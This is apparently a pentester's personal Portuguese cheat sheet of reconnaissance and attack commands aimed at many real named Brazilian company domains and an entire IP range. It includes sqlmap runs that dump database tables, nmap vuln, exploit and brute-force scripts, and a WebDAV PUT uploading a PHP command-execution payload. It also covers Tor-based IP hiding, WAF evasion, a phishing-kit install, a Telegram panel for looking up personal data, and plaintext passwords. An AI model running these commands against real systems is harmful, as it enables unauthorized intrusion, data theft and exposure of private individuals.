##Geração dos Subdomonios em Arquivo TXT
subfinder -d idtrack.com.br -all

==================================================================================================
###ANALISAR VULNERABILIDADES DA APLICAÇÃO
==================================================================================================
sudo uniscan -u scan.targetit.com.br -f -q -w -e -d -s -r -g -j
sudo uniscan -u https://intersept.bennercloud.com.br/RH/Login?ReturnUrl=%2fRH%3f -f -q -w -e -d -s -r -g -j
sudo uniscan -u parcela.bellinatiperez.com.br -qweds 
sudo uniscan -u http://access.webbl.com.br/login/signin -f -q -w -e -d -s -r -g -j	
sudo uniscan -u trcconsult.com.br -qweds1

==================================================================================================
Auto_Tor_IP_changer V 2.1 - Camuflando Endereço IP em Testes de Segurança
==================================================================================================
1: git clone https://github.com/FDX100/Auto_Tor_IP_changer.git
2 : cd Auto_Tor_IP_changer
3 : python3 autoTOR.py


https://www.linkedin.com/pulse/camuflando-endere%C3%A7o-ip-em-testes-de-seguran%C3%A7a-keven-s-lopes/
git clone https://github.com/Und3rf10w/kali-anonsurf.git
git clone https://github.com/Und3rf10w/kali-anonsurf && cd kali-anonsurf && sudo ./https://www.linkedin.com/redir/phishing-page?url=installer%2esh
cd kali-anonsurf/
chmod +x installer.sh
sudo ./installer.sh
anonsurf
sudo anonsurf start
sudo anonsurf change
sudo anonsurf myip
sudo anonsurf status
anonsurf stop
https://github.com/Und3rf10w/kali-anonsurf

###VERIFICAR IP NO LINUX
curl ifconfig.io

==================================================================================================
==================================================================================================
##BUSCAR TODAS AS POSSIVEIS VULNERABILIDADES COM CVEs JA ASSOCIADOS *********************
==================================================================================================
==================================================================================================
searchsploit LINUX 2.4.37
Exemplo: searchsploit apache 2.4
Mostrar descrição completa (incluindo o caminho completo e o link do arquivo):
Exemplo: searchsploit -w wordpress
Listar a URL para Exploits (Exploit-DB):
Exemplo: searchsploit -w phpmyadmin
Pesquisar usando regex (Expressões Regulares):
Exemplo: searchsploit -e "^WordPress.*Plugin"
Copiar um exploit para um diretório atual (útil para modificação e execução):
Exemplo: searchsploit -m 40019
Mostrar a versão do searchsploit instalada:
searchsploit --version
Atualizar o banco de dados do searchsploit
searchsploit -u
##Verificar Vulnerabilidade


==================================================================================================
ANALISE DE IPS CO NAABU
==================================================================================================
sudo apt install naabu

==================================================================================================
ANALISE DE URLS COM GAU
==================================================================================================
go install github.com/lc/gau/v2/cmd/gau@latest
https://github.com/lc/gau
https://www.youtube.com/watch?v=vueW-jjRYmI

==================================================================================================
XSStrike detecção de Cross Site Scripting
==================================================================================================
https://github.com/s0md3v/XSStrike


==================================================================================================
ANALISE DE VULNERABILIDADE
==================================================================================================
sudo whatweb -a3 altaconsulting.com.br
wpscan --url https://altaconsulting.com.br --enumerate u
dirb https://jogodotigre.com/

==================================================================================================
#############################################Ferramenta Recon: ReconFTW###########################
==================================================================================================
https://www.blackhatethicalhacking.com/tools/reconftw/
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d unisuam.edu.br -r
sudo ./reconftw.sh -d ntopus.com.br -a
mkdir idtrack.com.br
cd reconftw/
sudo ./reconftw.sh -d ntopus.com.br -r -a --deep -o /home/kali/
sudo ./reconftw.sh -d dynamox.solutions -a
sudo ./reconftw.sh -d unisuam.edu.br -r

==================================================================================================
==================================================================================================
2º RODAR Ferramenta Recon S N I P E R - ANALISAR VULNERABILIDADES E ESTRUTURA DO AMBIENTE
==================================================================================================
sudo sniper -t ntopus.com.r -o -m -re -fp -b 
sudo sniper -t henn.com.br -o -re -fp -b 
sudo sniper -f subs-ghelere.com.br.txt -m nuke -w GHELERE
sudo sniper -f subs-intersept.com.br.txt -m massportscan -w INTERSEPT02
sudo sniper -t viacaoouroeprata.com.br -o -re
sudo sniper -t unesul.com.br -o -re
sudo sniper -t accesslogistics.com.br  -o -re
==================================================================================================
##############################################WebCopilot##########################################
==================================================================================================
git clone https://github.com/h4r5h1t/webcopilot 
cd webcopilot
chmod +x webcopilot install.sh 
mv webcopilot /usr/bin/ 
./install.sh
webcopilot -d henn.com.br
==================================================================================================


MELHOR COMANDO
sudo uniscan -u https://sistemagio.grupogiovanella.com.br/login -f -q -w -e -d -s -r -j
cat escriba.com.br.txt | uniscan -u -f -q -w -e -d -s -r -j
PASTA DE REPORTS /usr/share/uniscan/report

##Detecção de firewall de aplicativo da Web usando WAFW00F
git clone https://github.com/EnableSecurity/wafw00f.git
cd wafw00f
python3 setup.py install
wafw00f https://sistemagio.grupogiovanella.com.br/login -a -v 
wafw00f https://cloud.idtrack.com.br/login -a -v 

##Offensive Security Tool: TerminatorZ
go install github.com/tomnomnom/waybackurls@latest
apt-get install curl
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
pip install lolcat
git clone https://github.com/blackhatethicalhacking/TerminatorZ.git
cd TerminatorZ
chmod +x TerminatorZ.sh
./TerminatorZ

==================================================================================================
######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [NIKTO]
==================================================================================================
sudo nikto -h scan.targetit.com.br -p 80,8080,443,445,20,22,21,23 -Display 2 -o ReportNiktoRacco.html
sudo nikto -h scan.targetit.com.br -c all
sudo nikto -h scan.targetit.com.br -mutate 1,2,3,4,5
sudo nikto -h cloud.idtrack.com.br -Tuning 1,2,3,4,5,6,7,8,9,9,a,b,c,d,e,x 
sudo nikto -c all -h www.milium.com.br -c all
sudo nikto -h www.intersept.com.br -C all
sudo nikto -h subs-ibcmed.org.txt -o Nikto-Online-IBCMED-tbr.txt  --> EXECUTANDO ANALISE EM VARIOS SUBDOMONIOS
sudo nikto -h sdp.org.br.txt -o Nikto-Online-sdp-tbr.txt
sudo nikto -h portal.polyterminais.com.br -o /home/kali/Desktop/Resultadoanalise.txt -evasion 1,2,3
sudo nikto -h scan.targetit.com.br -p 80,8080,443,445,20,22,21,23 -Display 2 -o ReportNiktoRacco.html
sudo nikto -c all -h www.intersept.com.br -c all
sudo nikto -h www.milium.com.br
sudo nikto -h 189.16.0.0/15 
sudo nikto -h https://lunelli.com.br -evasion 1,2,3
sudo nikto -h https://lunelli.com.br -port 8081

######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [WAPITI]

sudo wapiti -u https://my.rockfeller.com.br/login#/ -m slq,xss,xxe
sudo wapiti -u https://my.rockfeller.com.br/login#/
sudo wapiti -u http://crmdashboard.mastertechsistemas.com.br:80/cloud/
sudo wapiti -u https://my.rockfeller.com.br/login#/

######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [SKIPFISH]

sudo skipfish -o ColetaSkipFish.$rede http://www.ibridge.com.br
sudo skipfish http://www.ibridge.com.br
sudo skipfish -o /kali/home/$rede http://$rede

######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [GERAIS]

sudo joomscan -u https://sistema.imogestao.com.br
sudo parsero -u bellinatiperez.com.br -o -sb
dmitry -wnspb polyterminais.com.br -o /root/dmitry-resultado
cat /root/dmitry-resultado.txt

######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [WHATWEB]
whatweb --aggression 3 -v lunelli.com.br
whatweb --aggression 3 -v 189.16.0.0/15 --no-errors
whatweb --aggression 3 -v www.intersept.com.br
whatweb lunelli.com.br

######VERFICAR VULNERABILIDADES DE APLICAÇÕES WEB - [NUCLEI]
sudo nuclei -u scan.targetit.com.br -t cves/ -t exposures/
sudo nuclei -l subs-ouroeprata.com.txt--> EXECUNTANDO ANALISE COM NUCLEI
sudo nuclei -l ibcmed.org.txt
sudo nuclei -l dinamo.srv.br.txt
sudo nuclei -u 200.182.151.18
sudo nuclei -u scan.targetit.com.br -t cves/ -t exposures/
sudo nuclei -u https://assinador.escriba.com.br
sudo nuclei -u scan.targetit.com.br -t cves/ -t exposures/  -->executando vários modelos com velocidade.
sudo nuclei -l target_urls.txt -t cves/   -->Varredura de CVEs em uma determinada lista de URLs.
sudo nuclei -l subs-viacaoouroeprata.com.br.txt -t cves/ -t exposures/
PASTA DOS RELATORIOS --> /usr/share/sniper/loot/workspace/

============================================================================================
###ANALISE DE IPS COLETADOS = SAIDA EM TXT PARA GERAÇÃO DE RELATORIOS COM WEBMAP
============================================================================================
sudo nmap -sT -A -T4 -v -oX /tmp/webmap/EconetExt.xml -iL ips.txt --verbose
sudo nmap -sT -A -T4 -v --open --script=vuln -oX /tmp/webmap/HennExt.xml -iL ips.txt --verbose

============================================================================================
##########ATIVAR SERVIÇO WEBMAP
============================================================================================
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y docker.io  
sudo systemctl enable docker --now  

ATIVAÇÃO WEBMAP
**************************************************
sudo docker stop webmap
sudo mkdir /tmp/webmap
sudo docker rm webmap
sudo docker run -d \
         --name webmap \
         -h webmap \
         -p 8000:8000 \
         -v /tmp/webmap:/opt/xml \
         reborntc/webmap
	 
sudo docker start webmap
sudo docker exec -ti webmap /root/token
**********************************************

		sudo docker stop webmap
		sudo docker rm webmap

$ # now you can run Nmap and save the XML Report on /tmp/webmap
Now point your browser to http://localhost:8000

Generate new token
In order to access to the WebMap dashboard, you need a token. You can create a new token with:

$ docker exec -ti webmap /root/token

Ativar Servico WEBMAP
$ docker start webmap


Upgrade from previous release
$ # stop running webmap container
$ docker stop webmap

$ # remove webmap container
$ docker rm webmap

$ # pull new image from dockerhub
$ docker pull reborntc/webmap

$ # run WebMap
$ curl -sL http://bit.ly/webmapsetup | bash

####Testes com NESSUS - Web Application Tests
nikto -h subs-online-sci.txt 
Inserir os IPS dos Hosts de Aplicações para os Testes com Web Application Tests

###BUSCAR ARQUIVOS WEBDAV
curl -v -X OPTIONS https://webgiz.aix.com.br/sagradosul
nc -v https://webgiz.aix.com.br/sagradosul 80 -C
curl -v -X PUT -d "<?php system('id');?>" https://app.winker.com.br/intra/default/login teste.php
cadaver systextil.lunelli.com.br
davtest --url https://app.winker.com.br  

#####ARJUN – Ferramenta para IDENTIFICAR PARAMENTROS NO SITE
sudo arjun -i aquatone_urls.txt --stable -oJ results.ARJUN.json
sudo arjun -u https://portal.britania.com.br --stable
sudo arjun -u https://contratos.ibcmed.org

============================================================================================
##########INSTALAÇÃO OPEN VAS - REALIZAR ANÁLISE DE VULNERABILIDADES DA REDE INTERNA COM OPENVAS
============================================================================================
###REALIZAR ANÁLISE DE VULNERABILIDADES DA REDE INTERNA COM OPENVAS - GREENBONE 
sudo apt install openvas
gvm-setup
gvm-check-setup
https://localhost:9392
##Redefinição de senha
gvmd --user=admin --new-password=passwd;
*Nota: Para criar um novo usuário:
sudo runuser -u _gvm -- gvmd --create-user=admin2 --new-password=12345  
*Para alterar a senha do usuário existente:
sudo runuser -u _gvm -- gvmd --user=admin --new-password=Racso@1998

sudo gvm-start
sudo gvm-stop

diego.campos@mottanet.com.br
admin
https://acervolima.com/instalando-openvas-no-kali-linux/
### ATUALIZAR BASE FEED STATUS
sudo runuser -u _gvm -- greenbone-nvt-sync
sudo greenbone-nvt-sync
sudo greenbone-certdata-sync
sudo greenbone-scapdata-sync



#Adicionar a linha ao repositório:
vi /etc/apt/sources.list
deb http://http.debian.net/debian jessie-backports main

#Atualizar o sistema
apt update    

#Instalar o python
usar esse: sudo apt install virtualenv

# Clonar o repositório
git clone https://github.com/TheGroundZero/openvasreporting.git

============================================================================================
# Instalar os pacotes openvasreporting
============================================================================================
cd openvasreporting
sudo apt-get install python3-dev python3-pip
sudo apt-get install python3 
sudo apt-get upgrade python3 
pip3 install pip --upgrade
pip3 install build --upgrade
python3 -m build

# Instalar o módulo substituindo o nome do arquivo criado
pip3 install dist/OpenVAS_Reporting-1.5.post3-py3-none-any.whl 

Exportar o relatório de XML para XLSX
python3 -m openvasreporting -i openvasreport.xml -f xlsx

python3 -m openvasreporting -i /home/kali/Downloads/report-c04c0cf3-489b-42fb-b298-1b01874650cc.xml -f xlsx
python3 -m openvasreporting -i /home/kali/Downloads/task-83855462-72c5-4a7f-98ce-4c46db0eb644.xml -f xlsx


###GERAR CONSULTA DE ARQUIVOS 
metagoofil -d intersept.com.br -t doc,docx,ppt,pptx,xls,xlsx -l 50 -n 25 -o Intersept -f 

###ANALISE DE IPS COLETADOS = SAIDA EM XML
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute -iL idtrack.com.br --verbose

###Indicadores de Risco – Base de Exploração de CVEs - SploitScan
https://github.com/xaitax/SploitScan?tab=readme-ov-file

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Ferramentas para Analise de SQL Injection
https://github.com/s0md3v/Parth.git

parth -t viopex.com.br
https://www.viopex.com.br/publicidade/navegarem.asp?ID=629281

==================================================================================================
Indicadores de Risco – Base de Exploração de CVEs - SploitScan
==================================================================================================

https://github.com/xaitax/SploitScan?tab=readme-ov-file



==================================================================================================
==================================================================================================

https://github.com/Agressiv1njector/psqli-pro 

####PROCESSO PARA SCAN EM URL PARA ANALISE DE SQL INJECTION
###ANALISE DE VULNERABILIDADE
sqlmap -u “https://portal.polyterminais.com.br/verifica-cpf/” --random-agent --level=5 --risk=3 --text-only --batch -o --tamper=between,space2comment --dbs 
sqlmap -u https://www.lghk.com/product.php?id=142&pid=4 --level=5 --risk=3 --text-only --batch -o --tamper=between,space2comment --dbs 
sqlmap -u https://www.lghk.com/product.php?id=142&pid=4 --dbs --batch

sqlmap -u https://www.hotelveneza.com.br/web/site/index.php?p=hotel&id=1 --dbs --batch

###Em seguida, mostrará os nomes dos bancos de dados. Para este exemplo, diremos que possui um banco de dados chamado “fakebase1”. 
sqlmap.py -u “http://fakesite.com/fake.php?id=1” --random-agent --level=5 --risk=3 --text-only --batch -o --tamper=between,space2comment -D fakebase1 --columns 
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D PolyAduaneiro --tables users

sqlmap -u 'https://sis.bluefitacademia.com.br/ControlGym/View/Financeiro_O1.php?a1=4764566&a2=924073&a3=1' --dbs --batch --random-agent --threads 10

##Em seguida, ele exibirá as tabelas/colunas do banco de dados. Vamos fingir que existe uma tabela chamada “usuários” e queremos descartar toda a tabela de “usuários”
sqlmap.py -u “http://fakesite.com/fake.php?id=1” --random-agent --level=5 --risk=3 --text-only --batch -o --tamper=between,space2comment -D fakebase1 -T users --dump --threads=10

 PROCEDIMENTO DE RECON
01 - INFORMATION GATHERING DNS
###IDENTIFICAR E EVIDENCIAR AS INFORMAÇÕES NO REGISTRO.BR
https://www.registro.br/tecnologia/ferramentas/whois/

###ACESSO AOS DADOS PESSOAIS NO PAINEL DO TELEGRAN
Canal do Telegran Para Conssultas
https://i-find.org/painel

##Geração dos Subdomonios em Arquivo TXT
subfinder -d mgu-russian.com -all
subfinder -d mgu-russian.com -o subs-mgu-russian.com.txt -all

###NucleiFuzzer = Nuclei + Paramspider
git clone https://github.com/0xKayala/NucleiFuzzer.git
cd NucleiFuzzer
sudo chmod +x install.sh
./install.sh
nucleifuzzer -h
nucleifuzzer
https://github.com/0xKayala/NucleiFuzzer
UPDATE:
   -up, -update                      update nuclei engine to the latest released version
   -ut, -update-templates            update nuclei-templates to latest released version
   -ud, -update-template-dir string  custom directory to install / update nuclei-templates
   -duc, -disable-update-check       disable automatic nuclei/templates update check

##Geração de Analise com HTTPROBE para Subdomonios Efetivos
cat altenburg.com.br.txt | httprobe | tee subs-altenburg.com.br.txt


sudo nmap -p80 --script=http-enum agricopel.com.br
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

dnsrecon -d AGRICOPEL.COM.BR -t std

##AVALIAÇÃO DO SITE DA EMPRESA
https://securityheaders.com/

##Geração dos Subdomonios com FINDOMAIN
https://github.com/Findomain/Findomain/blob/master/docs/INSTALLATION.md#installation-in-linux-using-compiled-artifacts
findomain -t ghelere.com.br

##CONSULTA DNS NMAP
sudo nmap -script dns-brute -v -sn ghelere.com.br  --VERIFICAR DNS

##Geração dos Subdomonios com DNSMAP
dnsmap ghelere.com.br -r /tmp/ -d 3000

###Instalação Gophish
git clone https://github.com/gophish/gophish.git
cd gophish
go build
gophish
https://localhost:3333
https://github.com/gophish/gophish

##Geração dos Subdomonios com DNSENUM
dnsenum --private -r adama.com
dnsenum --noreverse -o mydomain.xml ghelere.com.br

##Geração dos Subdomonios com DNSRECON
dnsrecon -f -a -b -w -d ghelere.com.br
dnsrecon -f -d ghelere.com.br

###COLETA OSINT Nomes, e-mails, IPs, subdomínios e URLs [PEGAR IPS PARA O RELATORIO]
theHarvester -d ghelere.com.br -b all
theHarvester -d unesul.com.br -l 10 -b all
theHarvester -d ghelere.com.br -c -v -r
theHarvester -d ghelere.com.br -v -r
theHarvester -d adama.com -v -r
##Geração de Analise com HTTPROBE para Subdomonios Efetivos
cat subs-ghelere.com.br.txt | ./aquatone
sudo python3 -m http.server

http://0.0.0.0:8000/kali/aquatone_report.html#/pages/graph
cat subs-altenburg.com.br.txt | ./aquatone --ports 22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2000,2082,2222,2121,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5060,5061,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8075,8069,8080,8081,8083,8088,8090,8091,8095,8098,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672
cat Ipsa.txt | ./aquatone --ports 22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2000,2082,2222,2121,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5060,5061,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8075,8069,8080,8081,8083,8088,8090,8091,8095,8098,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672,1,3,4,6,7,9,13,17,19,26,30,32,33,37,42,43,49,53,70,79,85,88,90,99,100,106,109,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,445,458,464,465,481,497,500,512,515,524,541,543,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,903,911,912,981,987,990,992,993,995,999,1002,1007,1009,1011,1021,1100,1102,1104,1108,1110,1114,1117,1119,1121,1124,1126,1130,1132,1137,1138,1141,1145,1147,1149,1151,1152,1154,1163,1166,1169,1174,1175,1183,1185,1187,1192,1198,1199,1201,1213,1216,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,2010,2013,2020,2022,2030,2033,2035,2038,2040,2043,2045,2049,2065,2068,2099,2100,2103,2105,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3325,3333,3351,3367,3369,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,5963,5987,5989,5998,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565,6567,6580,6646,6666,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8002,8007,8011,8021,8022,8031,8042,8045,8080,8090,8093,8099,8100,8180,8181,8192,8194,8200,8222,8254,8290,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9003,9009,9011,9040,9050,9071,9080,9081,9090,9091,9099,9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9595,9618,9666,9876,9878,9898,9900,9917,9929,9943,9944,9968,9998,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32785,33354,33899,34571,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49161,49163,49165,49167,49175,49176,49400,49999,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389


22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2000,2082,2222,2121,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5060,5061,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8075,8069,8080,8081,8083,8088,8090,8091,8095,8098,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672,1,3,4,6,7,9,13,17,19,26,30,32,33,37,42,43,49,53,70,79,85,88,90,99,100,106,109,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,445,458,464,465,481,497,500,512,515,524,541,543,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,903,911,912,981,987,990,992,993,995,999,1002,1007,1009,1011,1021,1100,1102,1104,1108,1110,1114,1117,1119,1121,1124,1126,1130,1132,1137,1138,1141,1145,1147,1149,1151,1152,1154,1163,1166,1169,1174,1175,1183,1185,1187,1192,1198,1199,1201,1213,1216,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,2010,2013,2020,2022,2030,2033,2035,2038,2040,2043,2045,2049,2065,2068,2099,2100,2103,2105,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3325,3333,3351,3367,3369,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,5963,5987,5989,5998,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565,6567,6580,6646,6666,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8002,8007,8011,8021,8022,8031,8042,8045,8080,8090,8093,8099,8100,8180,8181,8192,8194,8200,8222,8254,8290,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9003,9009,9011,9040,9050,9071,9080,9081,9090,9091,9099,9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9595,9618,9666,9876,9878,9898,9900,9917,9929,9943,9944,9968,9998,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32785,33354,33899,34571,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49161,49163,49165,49167,49175,49176,49400,49999,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389



###Inspeção visual de sites pesquisa de sites em massa,  coleta de informações para a superfície de ataque do seu ambiente
sudo curl -s https://crt.sh/\?q\=%25.ghelere.com.br\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httprobe -c 150 | /home/kali/./aquatone

##Analise de Principais Portas respondendo em Aplicações nos Subidominios Encontrados --> Resultado_HTTPX.txt
git clone https://github.com/projectdiscovery/httpx.git
cd httpx/cmd/httpx
go build .
mv httpx /usr/local/bin/
httpx -h
sudo echo ghelere.com.br | sudo subfinder -silent | sudo httpx -sc -p 22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -o Resultado_HTTPX.txt


###COLETA OSINT - SUBDOMINIOS [INFORMAÇÕES PARA O RELATORIO]
amass intel -ip -d dominio.com  
amass enum -passive -d gazprom.com -o dominio.com.subs.txt 
sudo amass enum -d dominio.com
amass intel -active -d dominio.com
sudo amass enum -d dominio.com -brute
sudo amass enum -d dominio.com -brute -active


###IDENTIFICAR E EVIDENCIAR A ESTRUTURA E Informações do Dominio
https://dnsdumpster.com/

###COLETA OSINT - IPS [INFORMAÇÕES PARA O RELATORIO]
sudo amass enum -d ghelere.com.br -active -dir Resultado_Amass_ghelere.com.br -brute 
sudo amass enum -d igarashi.com.br -brute


###GERAR RELATORIO COM RENGINE

==================================================
04 - Realizar Fuzzing de Subdomínios e Estruturas
==================================================

###ENUMERAÇÃO SUBDOMINIOS, SUBDIRETORIOS E INTERFACES ADMINISTRATIVAS

#TURBOSEARCH 
git clone https://github.com/helviojunior/turbosearch
cd turbosearch && sudo ./turbosearch.py -t https://ghelere.com.br -w /usr/share/dirb/wordlists/big.txt -o report01_ghelere.com.br.txt
cd turbosearch && sudo ./turbosearch.py -t https://ghelere.com.br -w /usr/share/dirb/wordlists/big.txt  -x .pdf .sql .xls .csv .ini -o Turbo_Search_ghelere.com.br.txt
sudo cat report.txt | grep CODE:200
